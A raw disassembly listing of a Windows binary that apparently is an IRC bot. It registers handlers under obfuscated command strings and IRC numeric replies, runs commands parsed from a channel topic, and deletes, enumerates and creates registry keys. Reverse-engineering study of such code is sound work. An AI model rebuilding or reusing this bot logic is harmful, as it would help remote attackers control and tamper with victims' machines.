xor eax, eax
inc eax
jmp loc_420577
sub_42045F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420AB8 proc near ; DATA XREF: sub_420D91+29�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push edi
mov edi, [ebp+arg_8]
mov ecx, edi
call sub_41DB58
push eax
push [ebp+arg_0]
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_420B36
push 2
lea eax, [ebp+var_8]
push [ebp+arg_0]
push eax
call sub_42777F
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_420B36
cmp [ebp+var_4], 0
jz short loc_420B36
push esi
mov esi, offset dword_443F14
push esi
push [ebp+var_8]
call dword_437178 ; lstrcmpiA
test eax, eax
mov ecx, edi
jnz short loc_420B17
push offset off_443F18
push esi
call sub_41D09B
jmp short loc_420B1F
; ---------------------------------------------------------------------------
loc_420B17: ; CODE XREF: sub_420AB8+50�j
push [ebp+var_8]
call sub_41D074
loc_420B1F: ; CODE XREF: sub_420AB8+5D�j
mov eax, [ebp+arg_4]
push dword ptr [eax]
push offset dword_43AB8C
push [ebp+var_8]
push edi
call sub_41CE4A
add esp, 10h
pop esi
loc_420B36: ; CODE XREF: sub_420AB8+1D�j
; sub_420AB8+34�j ...
xor eax, eax
pop edi
leave
retn
sub_420AB8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420B3B proc near ; DATA XREF: sub_420D91+3A�o
var_2A3C = byte ptr -2A3Ch
var_32C = byte ptr -32Ch
var_12C = dword ptr -12Ch
var_2C = byte ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2A3Ch
call sub_429B60
push esi
push edi
push 2710h
lea eax, [ebp+var_2A3C]
push [ebp+arg_0]
push eax
call sub_429D10
lea eax, [ebp+var_2A3C]
push 3
push eax
lea eax, [ebp+var_C]
push eax
call sub_42777F
add esp, 18h
cmp [ebp+var_C], 0
jz loc_420CB0
cmp [ebp+var_8], 0
jz loc_420CB0
mov ecx, [ebp+arg_8]
call sub_41DB58
push eax
push [ebp+var_C]
call dword_437178 ; lstrcmpiA
test eax, eax
push 10h
lea eax, [ebp+var_2C]
jnz short loc_420BA7
push [ebp+var_8]
jmp short loc_420BAA
; ---------------------------------------------------------------------------
loc_420BA7: ; CODE XREF: sub_420B3B+65�j
push [ebp+var_C]
loc_420BAA: ; CODE XREF: sub_420B3B+6A�j
push eax
call sub_429D10
add esp, 0Ch
push 3Ah
push [ebp+arg_0]
call sub_42B1A0
mov esi, eax
pop ecx
inc esi
pop ecx
cmp byte ptr [esi], 2Bh
jnz short loc_420C0C
push offset asc_44DE08 ; "+"
push esi
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jz short loc_420C0C
push esi
call sub_4293A0
cmp eax, 6
pop ecx
jbe short loc_420C0C
push esi
call sub_4293A0
dec eax
push eax
push 1
push esi
call sub_4279C6
mov edi, eax
add esp, 10h
test edi, edi
jz short loc_420C0C
push edi
push offset dword_443EB0
call sub_415641
pop ecx
mov esi, edi
pop ecx
loc_420C0C: ; CODE XREF: sub_420B3B+8A�j
; sub_420B3B+9B�j ...
mov edi, offset dword_447730
push edi
push esi
call sub_429C5E
pop ecx
xor esi, esi
pop ecx
mov [ebp+var_12C], eax
inc esi
loc_420C23: ; CODE XREF: sub_420B3B+101�j
push edi
push 0
call sub_429C5E
pop ecx
mov [ebp+esi*4+var_12C], eax
test eax, eax
pop ecx
jz short loc_420C3E
inc esi
cmp esi, 40h
jl short loc_420C23
loc_420C3E: ; CODE XREF: sub_420B3B+FB�j
lea eax, [ebp+var_2C]
xor edi, edi
mov [ebp+var_10], eax
mov eax, offset aTopic ; "topic"
test esi, esi
mov [ebp+var_1C], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
jle short loc_420CB0
loc_420C58: ; CODE XREF: sub_420B3B+173�j
mov eax, [ebp+edi*4+var_12C]
test eax, eax
jz short loc_420CAB
push eax
lea eax, [ebp+var_32C]
push offset aS_5 ; "%s"
push eax
call sub_429B03
mov al, [ebp+var_32C]
add esp, 0Ch
cmp al, byte_4439A0
jnz short loc_420CAB
push 1F4h
call dword_437190 ; Sleep
push 1
push 1
push [ebp+arg_8]
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_32C]
push eax
call sub_40A935
add esp, 14h
loc_420CAB: ; CODE XREF: sub_420B3B+126�j
; sub_420B3B+149�j
inc edi
cmp edi, esi
jl short loc_420C58
loc_420CB0: ; CODE XREF: sub_420B3B+3C�j
; sub_420B3B+46�j ...
pop edi
xor eax, eax
pop esi
leave
retn
sub_420B3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420CB6 proc near ; DATA XREF: sub_420D91+89�o
var_C4 = dword ptr -0C4h
var_8 = dword ptr -8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0C4h
push esi
lea eax, [ebp+arg_8]
push edi
mov edi, [ebp+arg_8]
xor esi, esi
push eax
lea eax, [ebp+var_C4]
push esi
push eax
push offset loc_41C438
push esi
push esi
mov [ebp+var_C4], edi
mov [ebp+var_8], esi
call dword_437180 ; CreateThread
jmp short loc_420CF2
; ---------------------------------------------------------------------------
loc_420CEA: ; CODE XREF: sub_420CB6+3F�j
push 32h
call dword_437190 ; Sleep
loc_420CF2: ; CODE XREF: sub_420CB6+32�j
cmp [ebp+var_8], esi
jz short loc_420CEA
mov ecx, edi
call sub_41DB58
push eax
mov ecx, edi
call sub_41CF25
push offset byte_457F6C
mov ecx, edi
call sub_41D163
push offset off_443F18
push offset dword_443F14
mov ecx, edi
call sub_41D09B
pop edi
xor eax, eax
pop esi
leave
retn
sub_420CB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D29 proc near ; DATA XREF: sub_420D91+78�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push 2
push [ebp+arg_0]
lea eax, [ebp+var_8]
push eax
call sub_42777F
add esp, 0Ch
cmp [ebp+var_8], 0
jz short loc_420D6F
cmp [ebp+var_4], 0
jz short loc_420D6F
mov esi, offset byte_457F6D
push offset byte_454A54
push esi
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_420D6F
mov ecx, [ebp+arg_8]
push 0
push esi
push [ebp+var_4]
call sub_41D110
loc_420D6F: ; CODE XREF: sub_420D29+1B�j
; sub_420D29+21�j ...
xor eax, eax
pop esi
leave
retn
sub_420D29 endp
; =============== S U B R O U T I N E =======================================
sub_420D74 proc near ; DATA XREF: sub_420D91+B5�o
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push 5
push 7
call sub_41D181
mov ecx, [esp+arg_8]
push eax
call sub_41DB31
xor eax, eax
retn
sub_420D74 endp
; =============== S U B R O U T I N E =======================================
sub_420D8E proc near ; CODE XREF: sub_43017E+52�p
; DATA XREF: sub_420D91+7�o
xor eax, eax
retn
sub_420D8E endp
; =============== S U B R O U T I N E =======================================
sub_420D91 proc near ; CODE XREF: sub_418FA1+5A9�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push offset sub_420D8E
push offset dword_445B40
mov ecx, esi
call sub_41C58F
push offset sub_42045F
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
mov ecx, esi
call sub_41C58F
push offset sub_420AB8
push offset aBwIj0rhpgj1 ; "bw/Ij0rhPgj1"
mov ecx, esi
call sub_41C58F
mov ebx, offset sub_420B3B
mov ecx, esi
push ebx
push offset aFuv1h_fi8sc ; "FuV1H.fi8SC/"
call sub_41C58F
mov edi, offset sub_41E446
mov ecx, esi
push edi
push offset aKc4l5_savs3_ ; "KC4L5.sAVS3."
call sub_41C58F
push edi
push offset a302 ; "302"
mov ecx, esi
call sub_41C58F
push ebx
push offset a332 ; "332"
mov ecx, esi
call sub_41C58F
push offset sub_420D29
push offset a366 ; "366"
mov ecx, esi
call sub_41C58F
mov edi, offset sub_420CB6
mov ecx, esi
push edi
push offset a005 ; "005"
call sub_41C58F
push edi
push offset a376 ; "376"
mov ecx, esi
call sub_41C58F
push edi
push offset a422 ; "422"
mov ecx, esi
call sub_41C58F
push offset sub_420D74
push offset a433 ; "433"
mov ecx, esi
call sub_41C58F
pop edi
pop esi
pop ebx
retn
sub_420D91 endp
; =============== S U B R O U T I N E =======================================
sub_420E5B proc near ; CODE XREF: sub_40A9FE+1485�p
; sub_40A9FE+156F�p
arg_0 = dword ptr 4
push esi
mov esi, dword_437178
push edi
mov edi, [esp+8+arg_0]
push edi
push offset aHkey_local_mac ; "HKEY_LOCAL_MACHINE"
call esi ; dword_437178
test eax, eax
jz loc_420EFF
push edi
push offset aHklm ; "HKLM"
call esi ; dword_437178
test eax, eax
jz short loc_420EFF
push edi
push offset aHkey_current_u ; "HKEY_CURRENT_USER"
call esi ; dword_437178
test eax, eax
jz short loc_420EF8
push edi
push offset aHkcu ; "HKCU"
call esi ; dword_437178
test eax, eax
jz short loc_420EF8
push edi
push offset aHkey_classes_r ; "HKEY_CLASSES_ROOT"
call esi ; dword_437178
test eax, eax
jz short loc_420EF1
push edi
push offset aHkcr ; "HKCR"
call esi ; dword_437178
test eax, eax
jz short loc_420EF1
push edi
push offset aHkey_current_c ; "HKEY_CURRENT_CONFIG"
call esi ; dword_437178
test eax, eax
jz short loc_420EEA
push edi
push offset aHkcc ; "HKCC"
call esi ; dword_437178
test eax, eax
jz short loc_420EEA
push edi
push offset aHkey_users ; "HKEY_USERS"
call esi ; dword_437178
test eax, eax
jz short loc_420EE3
push edi
push offset off_44DE30
call esi ; dword_437178
test eax, eax
jnz short loc_420EFF
loc_420EE3: ; CODE XREF: sub_420E5B+7A�j
mov eax, 80000003h
jmp short loc_420F04
; ---------------------------------------------------------------------------
loc_420EEA: ; CODE XREF: sub_420E5B+62�j
; sub_420E5B+6E�j
mov eax, 80000005h
jmp short loc_420F04
; ---------------------------------------------------------------------------
loc_420EF1: ; CODE XREF: sub_420E5B+4A�j
; sub_420E5B+56�j
mov eax, 80000000h
jmp short loc_420F04
; ---------------------------------------------------------------------------
loc_420EF8: ; CODE XREF: sub_420E5B+32�j
; sub_420E5B+3E�j
mov eax, 80000001h
jmp short loc_420F04
; ---------------------------------------------------------------------------
loc_420EFF: ; CODE XREF: sub_420E5B+16�j
; sub_420E5B+26�j ...
mov eax, 80000002h
loc_420F04: ; CODE XREF: sub_420E5B+8D�j
; sub_420E5B+94�j ...
pop edi
pop esi
retn
sub_420E5B endp
; =============== S U B R O U T I N E =======================================
sub_420F07 proc near ; CODE XREF: sub_421126+158�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 4
ja short loc_420F3E
jz short loc_420F38
sub eax, 0
jz short loc_420F32
dec eax
jz short loc_420F2C
dec eax
jz short loc_420F26
dec eax
jnz short loc_420F4E
mov eax, offset aReg_binary ; "REG_BINARY"
retn
; ---------------------------------------------------------------------------
loc_420F26: ; CODE XREF: sub_420F07+14�j
mov eax, offset aReg_expand_sz ; "REG_EXPAND_SZ"
retn
; ---------------------------------------------------------------------------
loc_420F2C: ; CODE XREF: sub_420F07+11�j
mov eax, offset aReg_sz ; "REG_SZ"
retn
; ---------------------------------------------------------------------------
loc_420F32: ; CODE XREF: sub_420F07+E�j
mov eax, offset aReg_none ; "REG_NONE"
retn
; ---------------------------------------------------------------------------
loc_420F38: ; CODE XREF: sub_420F07+9�j
mov eax, offset aReg_dword ; "REG_DWORD"
retn
; ---------------------------------------------------------------------------
loc_420F3E: ; CODE XREF: sub_420F07+7�j
sub eax, 5
jz short loc_420F66
dec eax
jz short loc_420F60
dec eax
jz short loc_420F5A
sub eax, 4
jz short loc_420F54
loc_420F4E: ; CODE XREF: sub_420F07+17�j
mov eax, offset aUnknown_0 ; "UNKNOWN"
retn
; ---------------------------------------------------------------------------
loc_420F54: ; CODE XREF: sub_420F07+45�j
mov eax, offset aReg_qword ; "REG_QWORD"
retn
; ---------------------------------------------------------------------------
loc_420F5A: ; CODE XREF: sub_420F07+40�j
mov eax, offset aReg_multi_sz ; "REG_MULTI_SZ"
retn
; ---------------------------------------------------------------------------
loc_420F60: ; CODE XREF: sub_420F07+3D�j
mov eax, offset aReg_link ; "REG_LINK"
retn
; ---------------------------------------------------------------------------
loc_420F66: ; CODE XREF: sub_420F07+3A�j
mov eax, offset aReg_dword_big_ ; "REG_DWORD_BIG_ENDIAN"
retn
sub_420F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420F6C proc near ; CODE XREF: sub_418FA1+B4�p
; sub_420F6C+A8�p ...
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_C = byte ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
push esi
push edi
mov [ebp+var_4], ebx
jz loc_42108B
cmp [ebp+arg_8], ebx
jnz loc_42104D
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456E98 ; RegDeleteKeyA
test eax, eax
jz loc_421080
push 3Fh
xor eax, eax
pop ecx
lea edi, [ebp+var_10B]
mov [ebp+var_10C], bl
xor esi, esi
rep stosd
stosw
stosb
lea eax, [ebp+var_4]
mov [ebp+arg_8], 100h
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz loc_42108B
lea eax, [ebp+var_C]
push eax
push ebx
push ebx
lea eax, [ebp+arg_8]
push ebx
push eax
lea eax, [ebp+var_10C]
push eax
push ebx
push [ebp+var_4]
call dword_456E68 ; RegEnumKeyExA
mov edi, 103h
jmp short loc_42103B
; ---------------------------------------------------------------------------
loc_421003: ; CODE XREF: sub_420F6C+D1�j
cmp eax, ebx
jnz short loc_42103F
lea eax, [ebp+var_10C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_420F6C
add esp, 0Ch
lea ecx, [ebp+var_C]
mov eax, esi
inc esi
push ecx
push ebx
push ebx
lea ecx, [ebp+arg_8]
push ebx
push ecx
lea ecx, [ebp+var_10C]
push ecx
push eax
push [ebp+var_4]
call dword_456E68 ; RegEnumKeyExA
loc_42103B: ; CODE XREF: sub_420F6C+95�j
cmp eax, edi
jnz short loc_421003
loc_42103F: ; CODE XREF: sub_420F6C+99�j
push [ebp+arg_4]
push [ebp+var_4]
call dword_456E98 ; RegDeleteKeyA
jmp short loc_42108B
; ---------------------------------------------------------------------------
loc_42104D: ; CODE XREF: sub_420F6C+1D�j
lea eax, [ebp+var_4]
push eax
push 2001Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz short loc_42108B
push [ebp+arg_8]
push [ebp+var_4]
call dword_456E64 ; RegDeleteValueA
push [ebp+var_4]
test eax, eax
jnz short loc_421085
call dword_456F08 ; RegCloseKey
loc_421080: ; CODE XREF: sub_420F6C+31�j
xor eax, eax
inc eax
jmp short loc_42108D
; ---------------------------------------------------------------------------
loc_421085: ; CODE XREF: sub_420F6C+10C�j
call dword_456F08 ; RegCloseKey
loc_42108B: ; CODE XREF: sub_420F6C+14�j
; sub_420F6C+6E�j ...
xor eax, eax
loc_42108D: ; CODE XREF: sub_420F6C+117�j
pop edi
pop esi
pop ebx
leave
retn
sub_420F6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421092 proc near ; CODE XREF: sub_40A7C5+E3�p
; sub_40A7C5+F8�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
cmp edi, esi
mov [ebp+var_4], esi
jz short loc_421120
cmp [ebp+arg_8], esi
jz short loc_421120
lea eax, [ebp+var_4]
push eax
push 2001Fh
push esi
push edi
push [ebp+arg_0]
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz short loc_42111C
mov eax, [ebp+arg_C]
cmp eax, 4
jnz short loc_4210EB
lea eax, [ebp+arg_4]
mov [ebp+arg_4], esi
push eax
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_421126
add esp, 10h
xor eax, eax
cmp [ebp+arg_4], esi
setnz al
mov esi, eax
jmp short loc_421113
; ---------------------------------------------------------------------------
loc_4210EB: ; CODE XREF: sub_421092+35�j
cmp eax, 1
jz short loc_4210FA
cmp eax, 2
jz short loc_4210FA
cmp eax, 7
jnz short loc_421113
loc_4210FA: ; CODE XREF: sub_421092+5C�j
; sub_421092+61�j
push 1
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_421340
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
neg esi
loc_421113: ; CODE XREF: sub_421092+57�j
; sub_421092+66�j
push [ebp+var_4]
call dword_456F08 ; RegCloseKey
loc_42111C: ; CODE XREF: sub_421092+2D�j
mov eax, esi
jmp short loc_421122
; ---------------------------------------------------------------------------
loc_421120: ; CODE XREF: sub_421092+10�j
; sub_421092+15�j
xor eax, eax
loc_421122: ; CODE XREF: sub_421092+8C�j
pop edi
pop esi
leave
retn
sub_421092 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421126 proc near ; CODE XREF: sub_421092+45�p
var_604 = byte ptr -604h
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_3C = byte ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_28 = byte ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 604h
push ebx
lea eax, [ebp+var_8]
push edi
xor ebx, ebx
push eax
push 0F003Fh
push ebx
mov edi, 0FAh
push [ebp+arg_4]
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_1C], edi
push [ebp+arg_0]
mov [ebp+var_14], 44Ch
mov [ebp+var_20], 80h
mov [ebp+var_4], ebx
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz loc_4212C4
lea eax, [ebp+var_30]
push esi
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_34]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_38]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_20]
push ebx
push eax
lea eax, [ebp+var_1B8]
push eax
push [ebp+var_8]
call dword_456EC4 ; RegQueryInfoKeyA
cmp [ebp+var_C], ebx
mov [ebp+arg_0], ebx
jz short loc_421205
xor esi, esi
cmp [ebp+var_C], ebx
jbe short loc_421205
loc_4211B5: ; CODE XREF: sub_421126+DD�j
lea eax, [ebp+var_30]
mov [ebp+var_1C], edi
push eax
push ebx
push ebx
lea eax, [ebp+var_1C]
push ebx
push eax
lea eax, [ebp+var_138]
push eax
push esi
push [ebp+var_8]
call dword_456E68 ; RegEnumKeyExA
test eax, eax
jnz short loc_4211FC
lea eax, [ebp+var_138]
push eax
lea eax, [esi+1]
push [ebp+arg_4]
push eax
push offset a_2dSS ; "(%.2d) %s\\%s"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_41CE4A
add esp, 18h
inc [ebp+var_4]
loc_4211FC: ; CODE XREF: sub_421126+B0�j
inc esi
inc [ebp+arg_0]
cmp esi, [ebp+var_C]
jb short loc_4211B5
loc_421205: ; CODE XREF: sub_421126+86�j
; sub_421126+8D�j
cmp [ebp+var_10], ebx
jz loc_4212B0
xor edi, edi
cmp [ebp+var_10], ebx
jbe loc_4212B0
mov eax, [ebp+arg_0]
lea esi, [eax+1]
loc_42121F: ; CODE XREF: sub_421126+184�j
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_604]
push eax
push edi
push [ebp+var_8]
mov [ebp+var_14], 0FAh
mov [ebp+var_604], bl
call dword_456E04 ; RegEnumValueA
test eax, eax
jnz short loc_4212A5
lea eax, [ebp+var_604]
push offset byte_454A54
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_42127B
cmp [ebp+var_18], 1
jnz short loc_42127B
lea eax, [ebp+var_604]
push offset aDefault ; "(Default)"
push eax
call sub_429B03
pop ecx
pop ecx
loc_42127B: ; CODE XREF: sub_421126+13A�j
; sub_421126+140�j
push [ebp+var_18]
call sub_420F07
push eax
lea eax, [ebp+var_604]
push eax
push [ebp+arg_4]
push esi
push offset a_2dSSS ; "(%.2d) %s\\%s (%s)"
push [ebp+arg_8]
push [ebp+arg_C]
call sub_41CE4A
add esp, 20h
inc [ebp+var_4]
loc_4212A5: ; CODE XREF: sub_421126+124�j
inc edi
inc esi
cmp edi, [ebp+var_10]
jb loc_42121F
loc_4212B0: ; CODE XREF: sub_421126+E2�j
; sub_421126+ED�j
push [ebp+var_8]
call dword_456F08 ; RegCloseKey
xor eax, eax
cmp [ebp+var_4], ebx
pop esi
setnle al
jmp short loc_4212C6
; ---------------------------------------------------------------------------
loc_4212C4: ; CODE XREF: sub_421126+44�j
xor eax, eax
loc_4212C6: ; CODE XREF: sub_421126+19C�j
pop edi
pop ebx
leave
retn
sub_421126 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4212CA proc near ; CODE XREF: sub_41BC0B+96�p
; sub_41BCED+1C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 4
pop eax
xor esi, esi
mov [ebp+var_10], eax
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
mov [ebp+var_4], esi
push eax
push 0F003Fh
push esi
mov [ebp+var_8], esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz short loc_421336
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
push [ebp+arg_8]
push [ebp+var_4]
call dword_456DF0 ; RegQueryValueExA
push [ebp+var_4]
test eax, eax
jnz short loc_421330
call dword_456F08 ; RegCloseKey
mov eax, [ebp+arg_C]
mov dword ptr [eax], 1
mov eax, [ebp+var_8]
jmp short loc_42133D
; ---------------------------------------------------------------------------
loc_421330: ; CODE XREF: sub_4212CA+50�j
call dword_456F08 ; RegCloseKey
loc_421336: ; CODE XREF: sub_4212CA+30�j
mov eax, [ebp+arg_C]
mov [eax], esi
xor eax, eax
loc_42133D: ; CODE XREF: sub_4212CA+64�j
pop esi
leave
retn
sub_4212CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421340 proc near ; CODE XREF: sub_418FA1+5C�p
; sub_421092+71�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov eax, 0FFFFh
push esi
xor ebx, ebx
push eax
mov esi, offset dword_45AFE8
push ebx
push esi
mov [ebp+var_4], ebx
mov [ebp+var_8], eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456FC0 ; RegOpenKeyExA
test eax, eax
jnz short loc_4213E2
lea eax, [ebp+var_8]
push eax
push esi
push ebx
push ebx
push [ebp+arg_8]
push [ebp+var_4]
call dword_456DF0 ; RegQueryValueExA
test eax, eax
jnz short loc_4213D9
cmp [ebp+arg_C], 7
jnz short loc_4213CC
mov ecx, [ebp+var_8]
mov byte ptr dword_45AFE8[ecx], bl
loc_4213A4: ; CODE XREF: sub_421340+72�j
cmp ecx, ebx
jz short loc_4213B4
dec ecx
mov [ebp+var_8], ecx
cmp byte ptr dword_45AFE8[ecx], bl
jz short loc_4213A4
loc_4213B4: ; CODE XREF: sub_421340+66�j
xor edx, edx
cmp ecx, ebx
jbe short loc_4213CC
loc_4213BA: ; CODE XREF: sub_421340+8A�j
lea eax, dword_45AFE8[edx]
cmp [eax], bl
jnz short loc_4213C7
mov byte ptr [eax], 0Ah
loc_4213C7: ; CODE XREF: sub_421340+82�j
inc edx
cmp edx, ecx
jb short loc_4213BA
loc_4213CC: ; CODE XREF: sub_421340+59�j
; sub_421340+78�j
push [ebp+var_4]
call dword_456F08 ; RegCloseKey
mov eax, esi
jmp short loc_4213E4
; ---------------------------------------------------------------------------
loc_4213D9: ; CODE XREF: sub_421340+53�j
push [ebp+var_4]
call dword_456F08 ; RegCloseKey
loc_4213E2: ; CODE XREF: sub_421340+3C�j
xor eax, eax
loc_4213E4: ; CODE XREF: sub_421340+97�j
pop esi
pop ebx
leave
retn
sub_421340 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4213E8 proc near ; CODE XREF: sub_418FA1+2EB�p
; sub_418FA1+2F9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+var_4]
mov eax, [ebp+arg_C]
push eax
push 4
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421450
add esp, 18h
leave
retn
sub_4213E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421409 proc near ; CODE XREF: sub_418E0F+154�p
; sub_418FA1+2D5�p ...
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_10], 1
mov eax, [ebp+arg_C]
jnz short loc_421430
push eax
push [ebp+var_8]
push 1
loc_42141D: ; CODE XREF: sub_421409+33�j
; sub_421409+41�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_421450
add esp, 18h
leave
retn
; ---------------------------------------------------------------------------
loc_421430: ; CODE XREF: sub_421409+C�j
cmp [ebp+arg_10], 2
jnz short loc_42143E
push eax
push [ebp+var_8]
push 2
jmp short loc_42141D
; ---------------------------------------------------------------------------
loc_42143E: ; CODE XREF: sub_421409+2B�j
cmp [ebp+arg_10], 7
jnz short loc_42144C
push eax
push [ebp+var_8]
push 7
jmp short loc_42141D
; ---------------------------------------------------------------------------
loc_42144C: ; CODE XREF: sub_421409+39�j
xor eax, eax
leave
retn
sub_421409 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421450 proc near ; CODE XREF: sub_4213E8+17�p
; sub_421409+1D�p
var_10004 = byte ptr -10004h
var_10003 = byte ptr -10003h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_429B60
push ebx
xor ebx, ebx
lea eax, [ebp+arg_4]
push ebx
push eax
push ebx
push 20006h
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_456ED4 ; RegCreateKeyExA
test eax, eax
jz short loc_421485
xor eax, eax
jmp loc_421555
; ---------------------------------------------------------------------------
loc_421485: ; CODE XREF: sub_421450+2C�j
push esi
push edi
mov edi, [ebp+arg_8]
cmp edi, ebx
jz loc_421545
mov eax, [ebp+arg_C]
dec eax
jz loc_421558
dec eax
jz short loc_421510
dec eax
dec eax
jz short loc_421500
sub eax, 3
jnz loc_421548
push [ebp+arg_14]
call sub_4293A0
pop ecx
mov esi, eax
push [ebp+arg_14]
lea eax, [ebp+var_10004]
push eax
call dword_4370B4 ; lstrcpyA
xor ecx, ecx
cmp esi, ebx
mov [ebp+esi+var_10004], bl
mov [ebp+esi+var_10003], bl
jle short loc_4214F0
loc_4214DB: ; CODE XREF: sub_421450+9C�j
lea eax, [ebp+ecx+var_10004]
cmp byte ptr [eax], 0Ah
jnz short loc_4214E9
mov [eax], bl
loc_4214E9: ; CODE XREF: sub_421450+95�j
inc ecx
cmp ecx, esi
jl short loc_4214DB
cmp esi, ebx
loc_4214F0: ; CODE XREF: sub_421450+89�j
jz short loc_4214F4
inc esi
inc esi
loc_4214F4: ; CODE XREF: sub_421450:loc_4214F0�j
lea eax, [ebp+var_10004]
push esi
push eax
push 7
jmp short loc_421536
; ---------------------------------------------------------------------------
loc_421500: ; CODE XREF: sub_421450+51�j
mov eax, [ebp+arg_10]
push 4
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
push 4
jmp short loc_421536
